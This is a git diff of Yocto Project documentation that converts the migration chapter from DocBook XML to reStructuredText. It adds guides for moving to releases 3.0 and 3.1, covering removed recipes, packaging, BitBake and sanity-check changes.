+   removed.
+
+-  :ref:`native <ref-classes-native>` class:
+   :term:`RDEPENDS` handling has been enabled.
+
+-  ``inetutils``: This recipe has rsh disabled.
+
+
diff --git a/documentation/ref-manual/migration-3.0.rst b/documentation/ref-manual/migration-3.0.rst
new file mode 100644
index 0000000000..50f7d697b0
--- /dev/null
+++ b/documentation/ref-manual/migration-3.0.rst
@@ -0,0 +1,319 @@
+Moving to the Yocto Project 3.0 Release
+=======================================
+
+This section provides migration information for moving to the Yocto
+Project 3.0 Release from the prior release.
+
+.. _migration-3.0-init-system-selection:
+
+Init System Selection
+---------------------
+
+Changing the init system manager previously required setting a number of
+different variables. You can now change the manager by setting the
+``INIT_MANAGER`` variable and the corresponding include files (i.e.
+``conf/distro/include/init-manager-*.conf``). Include files are provided
+for four values: "none", "sysvinit", "systemd", and "mdev-busybox". The
+default value, "none", for ``INIT_MANAGER`` should allow your current
+settings to continue working. However, it is advisable to explicitly set
+``INIT_MANAGER``.
+
+.. _migration-3.0-lsb-support-removed:
+
+LSB Support Removed
+-------------------
+
+Linux Standard Base (LSB) as a standard is not current, and is not well
+suited for embedded applications. Support can be continued in a separate
+layer if needed. However, presently LSB support has been removed from
+the core.
+
+As a result of this change, the ``poky-lsb`` derivative distribution
+configuration that was also used for testing alternative configurations
+has been replaced with a ``poky-altcfg`` distribution that has LSB parts
+removed.
+
+.. _migration-3.0-removed-recipes:
+
+Removed Recipes
+---------------
+
+The following recipes have been removed.
+
+-  ``core-image-lsb-dev``: Part of removed LSB support.
+
+-  ``core-image-lsb``: Part of removed LSB support.
+
+-  ``core-image-lsb-sdk``: Part of removed LSB support.
+
+-  ``cve-check-tool``: Functionally replaced by the ``cve-update-db``
+   recipe and ``cve-check`` class.
+
+-  ``eglinfo``: No longer maintained. ``eglinfo`` from ``mesa-demos`` is
+   an adequate and maintained alternative.
+
+-  ``gcc-8.3``: Version 8.3 removed. Replaced by 9.2.
+
+-  ``gnome-themes-standard``: Only needed by gtk+ 2.x, which has been
+   removed.
+
+-  ``gtk+``: GTK+ 2 is obsolete and has been replaced by gtk+3.
+
+-  ``irda-utils``: Has become obsolete. IrDA support has been removed
+   from the Linux kernel in version 4.17 and later.
+
+-  ``libnewt-python``: ``libnewt`` Python support merged into main
+   ``libnewt`` recipe.
+
+-  ``libsdl``: Replaced by newer ``libsdl2``.
+
+-  ``libx11-diet``: Became obsolete.
+
+-  ``libxx86dga``: Removed obsolete client library.
+
+-  ``libxx86misc``: Removed. Library is redundant.
+
+-  ``linux-yocto``: Version 5.0 removed, which is now redundant (5.2 /
+   4.19 present).
+
+-  ``lsbinitscripts``: Part of removed LSB support.
+
+-  ``lsb``: Part of removed LSB support.
+
+-  ``lsbtest``: Part of removed LSB support.
+
+-  ``openssl10``: Replaced by newer ``openssl`` version 1.1.
+
+-  ``packagegroup-core-lsb``: Part of removed LSB support.
+
+-  ``python-nose``: Removed the Python 2.x version of the recipe.
+
+-  ``python-numpy``: Removed the Python 2.x version of the recipe.
+
+-  ``python-scons``: Removed the Python 2.x version of the recipe.
+
+-  ``source-highlight``: No longer needed.
+
+-  ``stress``: Replaced by ``stress-ng``.
+
+-  ``vulkan``: Split into ``vulkan-loader``, ``vulkan-headers``, and
+   ``vulkan-tools``.
+
+-  ``weston-conf``: Functionality moved to ``weston-init``.
+
+.. _migration-3.0-packaging-changes:
+
+Packaging Changes
+-----------------
+
+The following packaging changes have occurred.
+
+-  The `Epiphany <https://en.wikipedia.org/wiki/GNOME_Web>`__ browser
+   has been dropped from ``packagegroup-self-hosted`` as it has not been
+   needed inside ``build-appliance-image`` for quite some time and was
+   causing resource problems.
+
+-  ``libcap-ng`` Python support has been moved to a separate
+   ``libcap-ng-python`` recipe to streamline the build process when the
+   Python bindings are not needed.
+
+-  ``libdrm`` now packages the file ``amdgpu.ids`` into a separate
+   ``libdrm-amdgpu`` package.
+
+-  ``python3``: The ``runpy`` module is now in the ``python3-core``
+   package as it is required to support the common "python3 -m" command
+   usage.
+
+-  ``distcc`` now provides separate ``distcc-client`` and
+   ``distcc-server`` packages as typically one or the other are needed,
+   rather than both.
+
+-  ``python*-setuptools`` recipes now separately package the
+   ``pkg_resources`` module in a ``python-pkg-resources`` /
+   ``python3-pkg-resources`` package as the module is useful independent
+   of the rest of the setuptools package. The main ``python-setuptools``
+   / ``python3-setuptools`` package depends on this new package so you
+   should only need to update dependencies unless you want to take
+   advantage of the increased granularity.
+
+.. _migration-3.0-cve-checking:
+
+CVE Checking
+------------
+
+``cve-check-tool`` has been functionally replaced by a new
+``cve-update-db`` recipe and functionality built into the ``cve-check``
+class. The result uses NVD JSON data feeds rather than the deprecated
+XML feeds that ``cve-check-tool`` was using, supports CVSSv3 scoring,
+and makes other improvements.
+
+Additionally, the ``CVE_CHECK_CVE_WHITELIST`` variable has been replaced
+by ``CVE_CHECK_WHITELIST``.
+
+.. _migration-3.0-bitbake-changes:
+
+Bitbake Changes
+---------------
+
+The following BitBake changes have occurred.
+
+-  ``addtask`` statements now properly validate dependent tasks.
+   Previously, an invalid task was silently ignored. With this change,
+   the invalid task generates a warning.
+
+-  Other invalid ``addtask`` and ``deltask`` usages now trigger these
+   warnings: "multiple target tasks arguments with addtask / deltask",
+   and "multiple before/after clauses".
+
+-  The "multiconfig" prefix is now shortened to "mc". "multiconfig" will
+   continue to work, however it may be removed in a future release.
+
+-  The ``bitbake -g`` command no longer generates a
+   ``recipe-depends.dot`` file as the contents (i.e. a reprocessed
+   version of ``task-depends.dot``) were confusing.
+
+-  The ``bb.build.FuncFailed`` exception, previously raised by
+   ``bb.build.exec_func()`` when certain other exceptions have occurred,
+   has been removed. The real underlying exceptions will be raised
+   instead. If you have calls to ``bb.build.exec_func()`` in custom
+   classes or ``tinfoil-using`` scripts, any references to
+   ``bb.build.FuncFailed`` should be cleaned up.
+
+-  Additionally, the ``bb.build.exec_func()`` no longer accepts the
+   "pythonexception" parameter. The function now always raises
+   exceptions. Remove this argument in any calls to
+   ``bb.build.exec_func()`` in custom classes or scripts.
+
+-  The ``BB_SETSCENE_VERIFY_FUNCTION2`` variable
+   is no longer used. In the unlikely event that you have any references
+   to it, they should be removed.
+
+-  The ``RunQueueExecuteScenequeue`` and ``RunQueueExecuteTasks`` events
+   have been removed since setscene tasks are now executed as part of
+   the normal runqueue. Any event handling code in custom classes or
+   scripts that handles these two events need to be updated.
+
+-  The arguments passed to functions used with
+   :term:`bitbake:BB_HASHCHECK_FUNCTION`
+   have changed. If you are using your own custom hash check function,
+   see :yocto_git:`/cgit/cgit.cgi/poky/commit/?id=40a5e193c4ba45c928fccd899415ea56b5417725`
+   for details.
+
+-  Task specifications in ``BB_TASKDEPDATA`` and class implementations
+   used in signature generator classes now use "<fn>:<task>" everywhere
+   rather than the "." delimiter that was being used in some places.
+   This change makes it consistent with all areas in the code. Custom
+   signature generator classes and code that reads ``BB_TASKDEPDATA``
+   need to be updated to use ':' as a separator rather than '.'.
+
+.. _migration-3.0-sanity-checks:
+
+Sanity Checks
+-------------
+
+The following sanity check changes occurred.
+
+-  :term:`SRC_URI` is now checked for usage of two
+   problematic items:
+
+   -  "${PN}" prefix/suffix use - Warnings always appear if ${PN} is
+      used. You must fix the issue regardless of whether multiconfig or
+      anything else that would cause prefixing/suffixing to happen.
+
+   -  Github archive tarballs - these are not guaranteed to be stable.
+      Consequently, it is likely that the tarballs will be refreshed and
+      thus the SRC_URI checksums will fail to apply. It is recommended
+      that you fetch either an official release tarball or a specific
+      revision from the actual Git repository instead.
+
+   Either one of these items now trigger a warning by default. If you
+   wish to disable this check, remove ``src-uri-bad`` from
+   :term:`WARN_QA`.
+
+-  The ``file-rdeps`` runtime dependency check no longer expands
+   :term:`RDEPENDS` recursively as there is no mechanism
+   to ensure they can be fully computed, and thus races sometimes result
+   in errors either showing up or not. Thus, you might now see errors
+   for missing runtime dependencies that were previously satisfied
+   recursively. Here is an example: package A contains a shell script
+   starting with ``#!/bin/bash`` but has no dependency on bash. However,
+   package A depends on package B, which does depend on bash. You need
+   to add the missing dependency or dependencies to resolve the warning.
+
+-  Setting ``DEPENDS_${PN}`` anywhere (i.e. typically in a recipe) now
+   triggers an error. The error is triggered because
+   :term:`DEPENDS` is not a package-specific variable
+   unlike RDEPENDS. You should set ``DEPENDS`` instead.
+
+-  systemd currently does not work well with the musl C library because
+   only upstream officially supports linking the library with glibc.
+   Thus, a warning is shown when building systemd in conjunction with
+   musl.
+
+.. _migration-3.0-miscellaneous-changes:
+
+Miscellaneous Changes
+---------------------
+
+The following miscellaneous changes have occurred.
+
+-  The ``gnome`` class has been removed because it now does very little.
+   You should update recipes that previously inherited this class to do
+   the following: inherit gnomebase gtk-icon-cache gconf mime
+
+-  The ``meta/recipes-kernel/linux/linux-dtb.inc`` file has been
+   removed. This file was previously deprecated in favor of setting
+   :term:`KERNEL_DEVICETREE` in any kernel
+   recipe and only produced a warning. Remove any ``include`` or
+   ``require`` statements pointing to this file.
+
+-  :term:`TARGET_CFLAGS`,
+   :term:`TARGET_CPPFLAGS`,
+   :term:`TARGET_CXXFLAGS`, and
+   :term:`TARGET_LDFLAGS` are no longer exported
+   to the external environment. This change did not require any changes
+   to core recipes, which is a good indicator that no changes will be
+   required. However, if for some reason the software being built by one
+   of your recipes is expecting these variables to be set, then building
+   the recipe will fail. In such cases, you must either export the
+   variable or variables in the recipe or change the scripts so that
+   exporting is not necessary.
+
+-  You must change the host distro identifier used in
+   :term:`NATIVELSBSTRING` to use all lowercase
+   characters even if it does not contain a version number. This change
+   is necessary only if you are not using ``uninative`` and
+   :term:`SANITY_TESTED_DISTROS`.
+
+-  In the ``base-files`` recipe, writing the hostname into
+   ``/etc/hosts`` and ``/etc/hostname`` is now done within the main
+   :ref:`ref-tasks-install` function rather than in the
+   ``do_install_basefilesissue`` function. The reason for the change is
+   because ``do_install_basefilesissue`` is more easily overridden
+   without having to duplicate the hostname functionality. If you have
+   done the latter (e.g. in a ``base-files`` bbappend), then you should
+   remove it from your customized ``do_install_basefilesissue``
+   function.
+
+-  The ``wic --expand`` command now uses commas to separate "key:value"
+   pairs rather than hyphens.
+
+   .. note::
+
+      The wic command-line help is not updated.
+
+   You must update any scripts or commands where you use
+   ``wic --expand`` with multiple "key:value" pairs.
+
+-  UEFI image variable settings have been moved from various places to a
+   central ``conf/image-uefi.conf``. This change should not influence
+   any existing configuration as the ``meta/conf/image-uefi.conf`` in
+   the core metadata sets defaults that can be overridden in the same
+   manner as before.
+
+-  ``conf/distro/include/world-broken.inc`` has been removed. For cases
+   where certain recipes need to be disabled when using the musl C
+   library, these recipes now have ``COMPATIBLE_HOST_libc-musl`` set
+   with a comment that explains why.
+
+
diff --git a/documentation/ref-manual/migration-3.1.rst b/documentation/ref-manual/migration-3.1.rst
new file mode 100644
index 0000000000..4fcd2490d3
--- /dev/null
+++ b/documentation/ref-manual/migration-3.1.rst
@@ -0,0 +1,276 @@
+Moving to the Yocto Project 3.1 Release
+=======================================
+
+This section provides migration information for moving to the Yocto
+Project 3.1 Release from the prior release.
+
+.. _migration-3.1-minimum-system-requirements:
+
+Minimum system requirements
+---------------------------
+
+The following versions / requirements of build host components have been
+updated:
+
+-  gcc 5.0
+
+-  python 3.5
+
+-  tar 1.28
+
+-  ``rpcgen`` is now required on the host (part of the ``libc-dev-bin``
+   package on Ubuntu, Debian and related distributions, and the
+   ``glibc`` package on RPM-based distributions).
+
+Additionally, the ``makeinfo`` and ``pod2man`` tools are *no longer*
+required on the host.
+
+.. _migration-3.1-mpc8315e-rdb-removed:
+
+mpc8315e-rdb machine removed
+----------------------------
+
+The MPC8315E-RDB machine is old/obsolete and unobtainable, thus given
+the maintenance burden the ``mpc8315e-rdb`` machine configuration that
+supported it has been removed in this release. The removal does leave a
+gap in official PowerPC reference hardware support; this may change in
+future if a suitable machine with accompanying support resources is
+found.
+
+.. _migration-3.1-python-2-removed:
+
+Python 2 removed
+----------------
+
+Due to the expiration of upstream support in January 2020, support for
+Python 2 has now been removed; it is recommended that you use Python 3
+instead. If absolutely needed there is a meta-python2 community layer
+containing Python 2, related classes and various Python 2-based modules,
+however it should not be considered as supported.
+
+.. _migration-3.1-reproducible-builds:
+
+Reproducible builds now enabled by default
+------------------------------------------
+
+In order to avoid unnecessary differences in output files (aiding binary
+reproducibility), the Poky distribution configuration
+(``DISTRO = "poky"``) now inherits the ``reproducible_build`` class by
+default.
+
+.. _migration-3.1-ptest-feature-impact:
+
+Impact of ptest feature is now more significant
+-----------------------------------------------
+
+The Poky distribution configuration (``DISTRO = "poky"``) enables ptests
+by default to enable runtime testing of various components. In this
+release, a dependency needed to be added that has resulted in a
+significant increase in the number of components that will be built just
+when building a simple image such as core-image-minimal. If you do not
+need runtime tests enabled for core components, then it is recommended
+that you remove "ptest" from
+:term:`DISTRO_FEATURES` to save a significant
+amount of build time e.g. by adding the following in your configuration:
+::
+
+   DISTRO_FEATURES_remove = "ptest"
+
+.. _migration-3.1-removed-recipes:
+
+Removed recipes
+---------------
+
+The following recipes have been removed:
+
+-  ``chkconfig``: obsolete
+
+-  ``console-tools``: obsolete
+
+-  ``enchant``: replaced by ``enchant2``
+
+-  ``foomatic-filters``: obsolete
+
+-  ``libidn``: no longer needed, moved to meta-oe
+
+-  ``libmodulemd``: replaced by ``libmodulemd-v1``
+
+-  ``linux-yocto``: drop 4.19, 5.2 version recipes (5.4 now provided)
+
+-  ``nspr``: no longer needed, moved to meta-oe
+
+-  ``nss``: no longer needed, moved to meta-oe
+
+-  ``python``: Python 2 removed (Python 3 preferred)
+
+-  ``python-setuptools``: Python 2 version removed (python3-setuptools
+   preferred)
+
+-  ``sysprof``: no longer needed, moved to meta-oe
+
+-  ``texi2html``: obsolete
+
+-  ``u-boot-fw-utils``: functionally replaced by ``libubootenv``
+
+.. _migration-3.1-features-check:
+
+features_check class replaces distro_features_check
+---------------------------------------------------
+
+The ``distro_features_check`` class has had its functionality expanded,
+now supporting ``ANY_OF_MACHINE_FEATURES``,
+``REQUIRED_MACHINE_FEATURES``, ``CONFLICT_MACHINE_FEATURES``,
+``ANY_OF_COMBINED_FEATURES``, ``REQUIRED_COMBINED_FEATURES``,
+``CONFLICT_COMBINED_FEATURES``. As a result the class has now been
+renamed to ``features_check``; the ``distro_features_check`` class still
+exists but generates a warning and redirects to the new class. In
+preparation for a future removal of the old class it is recommended that
+you update recipes currently inheriting ``distro_features_check`` to
+inherit ``features_check`` instead.
+
+.. _migration-3.1-removed-classes:
+
+Removed classes
+---------------
+
+The following classes have been removed:
+
+-  ``distutils-base``: moved to meta-python2
+
+-  ``distutils``: moved to meta-python2
+
+-  ``libc-common``: merged into the glibc recipe as nothing else used
+   it.
+
+-  ``python-dir``: moved to meta-python2
+
+-  ``pythonnative``: moved to meta-python2
+
+-  ``setuptools``: moved to meta-python2
+
+-  ``tinderclient``: dropped as it was obsolete.
+
+.. _migration-3.1-src-uri-checksums:
+
+SRC_URI checksum behaviour
+--------------------------
+
+Previously, recipes by tradition included both SHA256 and MD5 checksums
+for remotely fetched files in :term:`SRC_URI`, even
+though only one is actually mandated. However, the MD5 checksum does not
+add much given its inherent weakness; thus when a checksum fails only
+the SHA256 sum will now be printed. The md5sum will still be verified if
+it is specified.
+
+.. _migration-3.1-npm:
+
+npm fetcher changes
+-------------------
+
+The npm fetcher has been completely reworked in this release. The npm
+fetcher now only fetches the package source itself and no longer the
+dependencies; there is now also an npmsw fetcher which explicitly
+fetches the shrinkwrap file and the dependencies. This removes the
+slightly awkward ``NPM_LOCKDOWN`` and ``NPM_SHRINKWRAP`` variables which
+pointed to local files; the lockdown file is no longer needed at all.
+Additionally, the package name in ``npm://`` entries in
+:term:`SRC_URI` is now specified using a ``package``
+parameter instead of the earlier ``name`` which overlapped with the
+generic ``name`` parameter. All recipes using the npm fetcher will need
+to be changed as a result.
+
+An example of the new scheme: ::
+
+   SRC_URI = "npm://registry.npmjs.org;package=array-flatten;version=1.1.1 \
+              npmsw://${THISDIR}/npm-shrinkwrap.json"
+
+Another example where the sources are fetched from git rather than an npm repository: ::
+
+   SRC_URI = "git://github.com/foo/bar.git;protocol=https \
+              npmsw://${THISDIR}/npm-shrinkwrap.json"
+
+devtool and recipetool have also been updated to match with the npm
+fetcher changes. Other than producing working and more complete recipes
+for npm sources, there is also a minor change to the command line for
+devtool: the ``--fetch-dev`` option has been renamed to ``--npm-dev`` as
+it is npm-specific.
+
+.. _migration-3.1-packaging-changes:
+
+Packaging changes
+-----------------
+
+-  ``intltool`` has been removed from ``packagegroup-core-sdk`` as it is
+   rarely needed to build modern software - gettext can do most of the
+   things it used to be needed for. ``intltool`` has also been removed
+   from ``packagegroup-core-self-hosted`` as it is not needed to for
+   standard builds.
+
+-  git: ``git-am``, ``git-difftool``, ``git-submodule``, and
+   ``git-request-pull`` are no longer perl-based, so are now installed
+   with the main ``git`` package instead of within ``git-perltools``.
+
+-  The ``ldconfig`` binary built as part of glibc has now been moved to
+   its own ``ldconfig`` package (note no ``glibc-`` prefix). This
+   package is in the :term:`RRECOMMENDS` of the main
+   ``glibc`` package if ``ldconfig`` is present in
+   :term:`DISTRO_FEATURES`.
+
+-  ``libevent`` now splits each shared library into its own package (as
+   Debian does). Since these are shared libraries and will be pulled in
+   through the normal shared library dependency handling, there should
+   be no impact to existing configurations other than less unnecessary
+   libraries being installed in some cases.
+
+-  linux-firmware now has a new package for ``bcm4366c`` and includes
+   available NVRAM config files into the ``bcm43340``, ``bcm43362``,
+   ``bcm43430`` and ``bcm4356-pcie`` packages.
+
+-  ``harfbuzz`` now splits the new ``libharfbuzz-subset.so`` library
+   into its own package to reduce the main package size in cases where
+   ``libharfbuzz-subset.so`` is not needed.
+
+.. _migration-3.1-package-qa-warnings:
+
+Additional warnings
+-------------------
+
+Warnings will now be shown at ``do_package_qa`` time in the following
+circumstances:
+
+-  A recipe installs ``.desktop`` files containing ``MimeType`` keys but
+   does not inherit the new ``mime-xdg`` class
+
+-  A recipe installs ``.xml`` files into ``${datadir}/mime/packages``
+   but does not inherit the ``mime`` class
+
+.. _migration-3.1-x86-live-wic:
+
+``wic`` image type now used instead of ``live`` by default for x86
+------------------------------------------------------------------
+
+``conf/machine/include/x86-base.inc`` (inherited by most x86 machine
+configurations) now specifies ``wic`` instead of ``live`` by default in
+:term:`IMAGE_FSTYPES`. The ``live`` image type will
+likely be removed in a future release so it is recommended that you use
+``wic`` instead.
+
+.. _migration-3.1-misc:
+
+Miscellaneous changes
+---------------------
+
+-  The undocumented ``SRC_DISTRIBUTE_LICENSES`` variable has now been
+   removed in favour of a new ``AVAILABLE_LICENSES`` variable which is
+   dynamically set based upon license files found in
+   ``${COMMON_LICENSE_DIR}`` and ``${LICENSE_PATH}``.
+
+-  The tune definition for big-endian microblaze machines is now
+   ``microblaze`` instead of ``microblazeeb``.
+
+-  ``newlib`` no longer has built-in syscalls. ``libgloss`` should then
+   provide the syscalls, ``crt0.o`` and other functions that are no
+   longer part of ``newlib`` itself. If you are using
+   ``TCLIBC = "newlib"`` this now means that you must link applications
+   with both ``newlib`` and ``libgloss``, whereas before ``newlib``
+   would run in many configurations by itself.
diff --git a/documentation/ref-manual/migration-general.rst b/documentation/ref-manual/migration-general.rst
new file mode 100644
index 0000000000..182482ec43
--- /dev/null
+++ b/documentation/ref-manual/migration-general.rst
@@ -0,0 +1,54 @@
+General Migration Considerations
+================================
+
+Some considerations are not tied to a specific Yocto Project release.
+This section presents information you should consider when migrating to
+any new Yocto Project release.
+
+-  *Dealing with Customized Recipes*:
+
+   Issues could arise if you take
+   older recipes that contain customizations and simply copy them
+   forward expecting them to work after you migrate to new Yocto Project
+   metadata. For example, suppose you have a recipe in your layer that
+   is a customized version of a core recipe copied from the earlier
+   release, rather than through the use of an append file. When you
+   migrate to a newer version of Yocto Project, the metadata (e.g.
+   perhaps an include file used by the recipe) could have changed in a
+   way that would break the build. Say, for example, a function is
+   removed from an include file and the customized recipe tries to call
+   that function.
+
+   You could "forward-port" all your customizations in your recipe so
+   that everything works for the new release. However, this is not the
+   optimal solution as you would have to repeat this process with each
+   new release if changes occur that give rise to problems.
+
+   The better solution (where practical) is to use append files
+   (``*.bbappend``) to capture any customizations you want to make to a
+   recipe. Doing so, isolates your changes from the main recipe making
+   them much more manageable. However, sometimes it is not practical to
+   use an append file. A good example of this is when introducing a
+   newer or older version of a recipe in another layer.
+
+-  *Updating Append Files*:
+
+   Since append files generally only contain
+   your customizations, they often do not need to be adjusted for new
+   releases. However, if the ``.bbappend`` file is specific to a
+   particular version of the recipe (i.e. its name does not use the %
+   wildcard) and the version of the recipe to which it is appending has
+   changed, then you will at a minimum need to rename the append file to
+   match the name of the recipe file. A mismatch between an append file
+   and its corresponding recipe file (``.bb``) will trigger an error
+   during parsing.
+
+   Depending on the type of customization the append file applies, other
+   incompatibilities might occur when you upgrade. For example, if your
+   append file applies a patch and the recipe to which it is appending
+   is updated to a newer version, the patch might no longer apply. If
+   this is the case and assuming the patch is still needed, you must
+   modify the patch file so that it does apply.
+
+
+
diff --git a/documentation/ref-manual/migration.rst b/documentation/ref-manual/migration.rst
new file mode 100644
index 0000000000..20288b0de8
--- /dev/null
+++ b/documentation/ref-manual/migration.rst
@@ -0,0 +1,30 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+******************************************
+Migrating to a Newer Yocto Project Release
+******************************************
+
+This chapter provides information you can use to migrate work to a newer
+Yocto Project release. You can find the same information in the release
+notes for a given release.
+
+.. toctree::
+
+   migration-general
+   migration-1.3
+   migration-1.4
+   migration-1.5
+   migration-1.6
+   migration-1.7
+   migration-1.8
+   migration-2.0
+   migration-2.1
+   migration-2.2
+   migration-2.3
+   migration-2.4
+   migration-2.5
+   migration-2.6
+   migration-2.7
+   migration-3.0
+   migration-3.1
+
diff --git a/documentation/ref-manual/migration.xml b/documentation/ref-manual/migration.xml
deleted file mode 100644
index affc8b90a7..0000000000
--- a/documentation/ref-manual/migration.xml
+++ /dev/null
@@ -1,7300 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='migration'>
-<title>Migrating to a Newer Yocto Project Release</title>
-
-    <para>
-        This chapter provides information you can use to migrate work to a
-        newer Yocto Project release.  You can find the same information in the
-        release notes for a given release.
-    </para>
-
-<section id='general-migration-considerations'>
-    <title>General Migration Considerations</title>
-
-    <para>
-        Some considerations are not tied to a specific Yocto Project
-        release.
-        This section presents information you should consider when
-        migrating to any new Yocto Project release.
-        <itemizedlist>
-            <listitem><para><emphasis>Dealing with Customized Recipes</emphasis>:
-                Issues could arise if you take older recipes that contain
-                customizations and simply copy them forward expecting them
-                to work after you migrate to new Yocto Project metadata.
-                For example, suppose you have a recipe in your layer that is
-                a customized version of a core recipe copied from the earlier
-                release, rather than through the use of an append file.
-                When you migrate to a newer version of Yocto Project, the
-                metadata (e.g. perhaps an include file used by the recipe)
-                could have changed in a way that would break the build.
-                Say, for example, a function is removed from an include file
-                and the customized recipe tries to call that function.
-                </para>
-
-                <para>You could "forward-port" all your customizations in your
-                recipe so that everything works for the new release.
-                However, this is not the optimal solution as you would have
-                to repeat this process with each new release if changes
-                occur that give rise to problems.</para>
-
-                <para>The better solution (where practical) is to use append
-                files (<filename>*.bbappend</filename>) to capture any
-                customizations you want to make to a recipe.
-                Doing so, isolates your changes from the main recipe making
-                them much more manageable.
-                However, sometimes it is not practical to use an append
-                file.
-                A good example of this is when introducing a newer or older
-                version of a recipe in another layer.</para>
-                </listitem>
-            <listitem><para><emphasis>Updating Append Files</emphasis>:
-                Since append files generally only contain your customizations,
-                they often do not need to be adjusted for new releases.
-                However, if the <filename>.bbappend</filename> file is
-                specific to a particular version of the recipe (i.e. its
-                name does not use the % wildcard) and the version of the
-                recipe to which it is appending has changed, then you will
-                at a minimum need to rename the append file to match the
-                name of the recipe file.
-                A mismatch between an append file and its corresponding
-                recipe file (<filename>.bb</filename>) will
-                trigger an error during parsing.</para>
-                <para>Depending on the type of customization the append file
-                applies, other incompatibilities might occur when you
-                upgrade.
-                For example, if your append file applies a patch and the
-                recipe to which it is appending is updated to a newer
-                version, the patch might no longer apply.
-                If this is the case and assuming the patch is still needed,
-                you must modify the patch file so that it does apply.
-                </para></listitem>
-        </itemizedlist>
-    </para>
-</section>
-
-<section id='moving-to-the-yocto-project-1.3-release'>
-    <title>Moving to the Yocto Project 1.3 Release</title>
-
-    <para>
-        This section provides migration information for moving to the
-        Yocto Project 1.3 Release from the prior release.
-    </para>
-
-    <section id='1.3-local-configuration'>
-        <title>Local Configuration</title>
-
-        <para>
-            Differences include changes for
-            <link linkend='var-SSTATE_MIRRORS'><filename>SSTATE_MIRRORS</filename></link>
-            and <filename>bblayers.conf</filename>.
-        </para>
-
-        <section id='migration-1.3-sstate-mirrors'>
-            <title>SSTATE_MIRRORS</title>
-
-            <para>
-                The shared state cache (sstate-cache), as pointed to by
-                <link linkend='var-SSTATE_DIR'><filename>SSTATE_DIR</filename></link>,
-                by default now has two-character subdirectories to prevent
-                issues arising from too many files in the same directory.
-                Also, native sstate-cache packages, which are built to run
-                on the host system, will go into a subdirectory named using
-                the distro ID string.
-                If you copy the newly structured sstate-cache to a mirror
-                location (either local or remote) and then point to it in
-                <link linkend='var-SSTATE_MIRRORS'><filename>SSTATE_MIRRORS</filename></link>,
-                you need to append "PATH" to the end of the mirror URL so that
-                the path used by BitBake before the mirror substitution is
-                appended to the path used to access the mirror.
-                Here is an example:
-                <literallayout class='monospaced'>
-     SSTATE_MIRRORS = "file://.* http://<replaceable>someserver</replaceable>.tld/share/sstate/PATH"
-                </literallayout>
-            </para>
-        </section>
-
-        <section id='migration-1.3-bblayers-conf'>
-            <title>bblayers.conf</title>
-
-            <para>
-                The <filename>meta-yocto</filename> layer consists of two parts
-                that correspond to the Poky reference distribution and the
-                reference hardware Board Support Packages (BSPs), respectively:
-                <filename>meta-yocto</filename> and
-                <filename>meta-yocto-bsp</filename>.
-                When running BitBake for the first time after upgrading,
-                your <filename>conf/bblayers.conf</filename> file will be
-                updated to handle this change and you will be asked to
-                re-run or restart for the changes to take effect.
-            </para>
-        </section>
-    </section>
-
-    <section id='1.3-recipes'>
-        <title>Recipes</title>
-
-        <para>
-            Differences include changes for the following:
-            <itemizedlist>
-                <listitem><para>Python function whitespace</para></listitem>
-                <listitem><para><filename>proto=</filename> in <filename>SRC_URI</filename></para></listitem>
-                <listitem><para><filename>nativesdk</filename></para></listitem>
-                <listitem><para>Task recipes</para></listitem>
-                <listitem><para><filename>IMAGE_FEATURES</filename></para></listitem>
-                <listitem><para>Removed recipes</para></listitem>
-            </itemizedlist>
-        </para>
-
-        <section id='migration-1.3-python-function-whitespace'>
-            <title>Python Function Whitespace</title>
-
-            <para>
-                All Python functions must now use four spaces for indentation.
-                Previously, an inconsistent mix of spaces and tabs existed,
-                which made extending these functions using
-                <filename>_append</filename> or <filename>_prepend</filename>
-                complicated given that Python treats whitespace as
-                syntactically significant.
-                If you are defining or extending any Python functions (e.g.
-                <filename>populate_packages</filename>, <filename>do_unpack</filename>,
-                <filename>do_patch</filename> and so forth) in custom recipes
-                or classes, you need to ensure you are using consistent
-                four-space indentation.
-            </para>
-        </section>
-
-        <section id='migration-1.3-proto=-in-src-uri'>
-            <title>proto= in SRC_URI</title>
-
-            <para>
-                Any use of <filename>proto=</filename> in
-                <link linkend='var-SRC_URI'><filename>SRC_URI</filename></link>
-                needs to be changed to <filename>protocol=</filename>.
-                In particular, this applies to the following URIs:
-                <itemizedlist>
-                    <listitem><para><filename>svn://</filename></para></listitem>
-                    <listitem><para><filename>bzr://</filename></para></listitem>
-                    <listitem><para><filename>hg://</filename></para></listitem>
-                    <listitem><para><filename>osc://</filename></para></listitem>
-                </itemizedlist>
-                Other URIs were already using <filename>protocol=</filename>.
-                This change improves consistency.
-            </para>
-        </section>
-
-        <section id='migration-1.3-nativesdk'>
-            <title>nativesdk</title>
-
-            <para>
-                The suffix <filename>nativesdk</filename> is now implemented
-                as a prefix, which simplifies a lot of the packaging code for
-                <filename>nativesdk</filename> recipes.
-                All custom <filename>nativesdk</filename> recipes, which are
-                relocatable packages that are native to
-                <link linkend='var-SDK_ARCH'><filename>SDK_ARCH</filename></link>,
-                and any references need to be updated to use
-                <filename>nativesdk-*</filename> instead of
-                <filename>*-nativesdk</filename>.
-            </para>
-        </section>
-
-        <section id='migration-1.3-task-recipes'>
-            <title>Task Recipes</title>
-
-            <para>
-                "Task" recipes are now known as "Package groups" and have
-                been renamed from <filename>task-*.bb</filename> to
-                <filename>packagegroup-*.bb</filename>.
-                Existing references to the previous <filename>task-*</filename>
-                names should work in most cases as there is an automatic
-                upgrade path for most packages.
-                However, you should update references in your own recipes and
-                configurations as they could be removed in future releases.
-                You should also rename any custom <filename>task-*</filename>
-                recipes to <filename>packagegroup-*</filename>, and change
-                them to inherit <filename>packagegroup</filename> instead of
-                <filename>task</filename>, as well as taking the opportunity
-                to remove anything now handled by
-                <filename>packagegroup.bbclass</filename>, such as providing
-                <filename>-dev</filename> and <filename>-dbg</filename>
-                packages, setting
-                <link linkend='var-LIC_FILES_CHKSUM'><filename>LIC_FILES_CHKSUM</filename></link>,
-                and so forth.
-                See the
-                "<link linkend='ref-classes-packagegroup'><filename>packagegroup.bbclass</filename></link>"
-                section for further details.
-            </para>
-        </section>
-
-        <section id='migration-1.3-image-features'>
-            <title>IMAGE_FEATURES</title>
-
-            <para>
-                Image recipes that previously included "apps-console-core"
-                in <link linkend='var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></link>
